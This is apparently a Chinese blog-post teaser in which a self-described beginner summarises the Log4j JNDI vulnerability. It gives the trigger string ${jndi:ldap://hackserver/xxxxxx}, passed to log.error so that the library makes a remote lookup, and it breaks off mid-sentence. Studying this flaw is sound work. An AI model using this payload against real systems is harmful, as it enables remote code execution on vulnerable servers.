摘要： 声明：没研究过Java漏洞，有错误的地方一定要告诉我！！原理我也没有继续跟。 01 分析 师傅带着理了一遍，思路清晰了。 一句话总结就是：让引用了log4j的漏洞类，然后把${jndi:ldap://hackserver/xxxxxx}当作参数传到log4j的log.error ，就会通过动态的远程 阅读全文